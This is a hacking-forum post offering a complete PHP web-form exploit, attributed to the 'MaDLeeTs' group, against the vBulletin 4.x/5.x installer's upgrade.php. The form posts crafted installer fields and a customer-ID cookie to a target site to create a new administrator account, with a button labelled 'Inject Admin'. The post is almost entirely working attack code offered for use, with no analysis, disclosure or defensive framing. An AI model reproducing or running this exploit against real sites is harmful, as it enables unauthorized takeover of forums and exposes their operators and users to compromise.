[ame="www.youtube.com/watch?v=5aWbbK5odbM"]www.youtube.com/watch?v=5aWbbK5odbM[/ame]
vBulletin hacked Zero Day vulnerability
Downlaod da Shell:
<html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>vBulletin 0day</title> <style type="text/css"> <!-- body { background-color: #000; text-align: center; color: #063; font-size: large; } .a { font-size: 24px; } .f { color: #060; } .gbf { color: #F00; } .dd { color: #F00; } .w { font-size: large; } a:link { text-decoration: none; } a:visited { text-decoration: none; } a:hover { text-decoration: none; } a:active { text-decoration: none; } --> </style></head><body> <p class="a"> <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1> <br>Created by: 1337 <br>Found on: 08/22/2013 <br>Website: http://www.madleets.com </p> <br> <?php //extract data from the post if(isset($_POST['submit'])){ extract($_POST); //set POST variables $url = $_POST['url']; $fields = array( 'ajax' => urlencode('1'), 'version' => urlencode('install'), 'checktable' => urlencode('false'), 'firstrun' => urlencode('false'), 'step' => urlencode('7'), 'startat' => urlencode('0'), 'only' => urlencode('false'), 'customerid' => urlencode($_POST['customerid']), 'options[skiptemplatemerge]' => urlencode('0'), 'response' => urlencode('yes'), 'htmlsubmit' => urlencode('1'), 'htmldata[username]' => urlencode($_POST['username']), 'htmldata[password]' => urlencode($_POST['password']), 'htmldata[confirmpassword]' => urlencode($_POST['password']), 'htmldata[email]' => urlencode($_POST['email']) ); //url-ify the data for the POST foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; } rtrim($fields_string, '&'); //open connection $ch = curl_init(); //set the url, number of POST vars, POST data curl_setopt($ch,CURLOPT_URL, $url); curl_setopt($ch,CURLOPT_POST, count($fields)); curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string); curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE); curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] ); //execute post $result = curl_exec($ch); //close connection curl_close($ch); exit(); } ?> <center> <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>"> <span>Example:http://test.com/forum/install/upgrade.php</span><br> <span>Website:</span> <input name="url" type="text" tabindex="1" size="60" /> <br> <span>Customer ID:</span> <input name="customerid" type="text" tabindex="2" size="40" /> <br> <span>Username:</span> <input name="username" type="text" tabindex="3" size="40" /> <br> <span>Password:</span> <input name="password" type="text" tabindex="4" size="40" /> <br> <span>Email:</span> <input name="email" type="text" tabindex="5" maxlength="40" /> <input name="submit" type="submit" value="Inject Admin"> </form> </center> <p class="a">------------------------------------------------------------------------------------------------------------------</p> <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p> <p class="a">------------------------------------------------------------------------------------------------------------------</p> </div> </pre> <p class="a"> </p> <p align="center"> </body></html>
Comment